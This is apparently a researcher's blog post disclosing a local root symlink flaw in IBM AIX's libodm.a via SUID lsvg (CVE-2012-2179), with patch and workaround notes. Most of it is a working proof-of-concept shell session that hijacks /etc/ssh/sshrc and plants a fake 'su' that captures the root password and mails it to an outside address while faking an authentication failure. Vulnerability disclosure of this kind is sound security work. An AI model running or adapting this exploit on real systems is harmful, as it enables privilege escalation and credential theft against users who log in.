This is new local attack for at least AIX 6.1 / 7.1 or at least there were enough time for anyone seriously considering security to patch their systems (IBM released info on 2012-06-22, today is 2012-07-12) … this is typical arbitrary file overwrite symlink vulnerability due to libodm.a bug giving local root. libodm.a (in this case used by SUID lsvg) performs an getenv(“ODMERR”) – undocumented env variable – which if is set triggers the debug code to dump the contents of debug log message generated in runtime by libodm.a to always the same file – ODMTRACE0 (or ODMTRACE1, etc) in current runtime directory (seems to be related to getcwd()). Proof:
guest@XXX:# oslevel -s 7100-00-03-1115 guest@XXX:# export ODMERR=1 guest@XXX:# ln -s /etc/ssh/sshrc ODMTRACE0 guest@XXX:# ls -l total 0 lrwxrwxrwx 1 install staff 14 Dec 22 05:42 ODMTRACE0 -> /etc/ssh/sshrc guest@XXX:# umask 0000 guest@XXX:# lsvg rootvg appvg guest@XXX:# ls -l total 0 lrwxrwxrwx 1 install staff 14 Dec 22 05:42 ODMTRACE0 -> /etc/ssh/sshrc guest@XXX:# head -3 ODMTRACE0 __odm_initfini_init: Start __odm_initfini_init: End odm_set_path: Start guest@XXX:# ls -l /etc/ssh/sshrc -rw-rw-rw- 1 root staff 7332 Dec 22 05:42 /etc/ssh/sshrc guest@XXX:# guest@XXX:# vi /etc/ssh/sshrc # a lot of typing guest@XXX:# cat /etc/ssh/sshrc #!/bin/sh # proof of concept for lsvg(1) AIX61/71 0-day exploit, 22/12/2011, vnull # # /etc/environment usually sets PATH from scratch so we have to # cheat via ~/.profile which is read by user's shell at later stage # mkdir /tmp/$$ cat > /tmp/$$/su << EOF #!/bin/bash #this would be a su backdoor sendming email or transmiting pw over dns... echo -e "root's Password: \c" stty -echo read PW stty echo echo #echo your PW is \$PW echo \$USER \$HOSTNAME \$PW | mail -s cookie firstname.lastname@example.org > /dev/null 2>&1 echo '[compat]: 3004-300 You entered an invalid login name or password.' echo echo '3004-501 Cannot su to "root" : Authentication is denied.' rm -f /tmp/$$/su exit 0 EOF chmod 755 /tmp/$$/su cat >> ~/.profile << EOF export PATH=/tmp/$$:$PATH EOF guest@XXX:#
How does it work? If the above attack is performed, and somebody else logs in using ssh remotely (root or just simple user), then /etc/ssh/sshrc contents are executed (by sshd) with his privilege level. In this case PATH is altered to hijack “su” executions and obtain potentially password. This could be also adapted e.g. to catch “sudo” password too.
Potential workaround: drop all SUIDs from all binaries linked to libodm.a (yes i find it kind of hard due to need of dropping even SUID from lsvg, which may break a lot of IBM/3rd software, especially some agents using commands such as lsvg to monitoring stuff.
Fixed via CVE-2012-2179, more info here http://aix.software.ibm.com/aix/efixes/security/libodm_advisory.asc
Still IBM AIX doesn’t come with proper hardened protection against /tmp races as mentioned in previous blog entry about CVE-2011-1384. Timeline: almost 180 days to fix for IBM.
BTW: This proof of concept could be easily adapted to give instant root (as you can create any file that does not exists), but I’m not going to disclose weaponized versions.